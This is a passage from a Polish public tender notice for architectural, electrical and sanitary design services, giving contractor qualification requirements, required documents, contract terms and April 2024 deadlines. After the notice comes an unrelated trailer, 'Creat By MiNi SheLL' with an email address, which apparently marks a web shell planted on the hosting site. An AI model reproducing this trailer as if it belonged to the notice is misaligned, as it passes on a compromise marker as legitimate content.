brutto PLN (sześćdziesiąt tysięcy złotych)<br/><br/>i potwierdzi ten fakt dowodem tj. Referencją bądź innym dokumentem , ( dokument powinien określać wartość i przedmiot dostaw, podmiot wystawiający dokument, ) lub oświadczeniem wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów<br/><br/>2.Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia i będą odpowiedzialnymi za świadczenie usług oraz posiadającymi wymagane kwalifikacje zawodowe i doświadczenie, niezbędne do wykonywania zamówienia, tj.:<br/><br/>• Architekt/projektant (co najmniej 1 osoba), posiadająca co najmniej: 5 letnie doświadczenie oraz uprawnienia budowlane* w specjalności architektonicznej do projektowania bez ograniczeń.<br/><br/>• Projektant branży elektrycznej (co najmniej 1 osoba), posiadająca co najmniej:5 letnie doświadczenie oraz uprawnienia budowlane* w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do projektowania bez ograniczeń.<br/><br/>• Projektant branży sanitarnej (co najmniej 1 osoba), posiadająca co najmniej: 5 letnie doświadczenie oraz uprawnienia budowlane* w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do projektowania bez ograniczeń.<br/>(Uwaga: Przez uprawnienia budowlane rozumie się:<br/>1) prawo wykonywania samodzielnych funkcji technicznych w budownictwie, o którym mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U.2023 poz.682 ) oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. 2019 poz. 831), lub uzyskane przed dniem wejścia w życie ustawy - Prawo budowlane, lub<br/>2) odpowiadające im ważne uprawnienia budowlane wydane na podstawie odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznane przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r., o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U.2023 poz 334 ), lub<br/>3) prawo do świadczenia na terytorium Rzeczypospolitej Polskiej usługi transgranicznej w rozumieniu art.5 pkt 10 ustawy cytowanej w ppkt. 2), oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz. U. z 2023 r. poz. 551).) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 Pzp w zakresie odnoszącym się do podstaw<br/>wykluczenia wskazanych w art. 108 ust. 1 pkt 1-6 Pzp oraz w art. 109 ust. 1 pkt 4 wzór oświadczenia stanowi Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonywanych lub wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, (wg. odpowiedniego warunku udziału w postępowaniu) oraz załączeniem dowodów określających czy zostały wykonane lub są wykonywane należycie<br/>przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot ma rzecz którego dostawy były wykonywane a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy<br/>wzór stanowi Załącznik nr 6 do SWZ.<br/>- Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami Załącznik nr 8 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo osoby reprezentującej<br/>wspólnie działających wykonawców, określające postępowanie do którego się odnosi, precyzujące zakres umocowania oraz<br/>określające osobę pełnomocnika i wykonawców udzielających pełnomocnictwa. Pełnomocnictwo powinno być podpisane<br/>przez wszystkich wykonawców..W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o niepodleganiu wykluczeniu z postępowania - wzór zawarty jest w załączniku nr 3a do SWZ składa każdy z wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z częścią XXIII. SWZ- ZAMAWIAJĄCY DOPUSZCZA ZMIANĘ ZAWARTEJ UMOWY W NASTĘPUJĄCYCH OKOLICZNOŚCIACH<br/>oraz z załącznikiem nr 4 do SWZ - wzorem umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest złożyć ofertę według wzoru stanowiącego załącznik nr 1 do SWZ oraz załączyć do oferty<br/>aktualne nadzień składania ofert następujące oświadczenia i dokumenty:<br/>1.1. Formularz cenowy -załącznik nr 2 do SWZ.<br/>1.2 Oświadczenie o niepodleganiu wykluczeniu z postępowania - wzór zawarty jest w załączniku nr 3a do SWZ.<br/>1.3 Oświadczenie o spełnianiu warunków udziału w postępowaniu- wzór zawarty jest w załączniku nr 3b do SWZ. <br/>1.4. W przypadku realizacji zamówienia przy udziale podwykonawców należy złożyć oświadczenie wskazujące podwykonawcę i część zamówienia, która będzie przez niego realizowana.<br/><br/>1.5. W przypadku gdy w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów tj. KRS-u, CEiIoDG, innego rejestru, Wykonawca zobowiązany jest do zło-żenia pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania <br/>1.6 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo osoby reprezentującej wspólnie działających wykonawców, określające postępowanie do którego się od-nosi, precyzujące zakres umocowania oraz określające osobę pełnomocnika i wykonawców udzielających pełnomocnictwa. Pełnomocnictwo powinno być podpisane przez wszystkich wykonawców.<br/><br/><br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 1.2 składa<br/>każdy z wykonawców, potwierdzając brak podstaw wykluczenia oraz oświadczenie, o którym mowa w pkt 1.3 spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą<br/>zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów, a także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego pod-miotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby

Creat By MiNi SheLL
Email: jattceo@gmail.com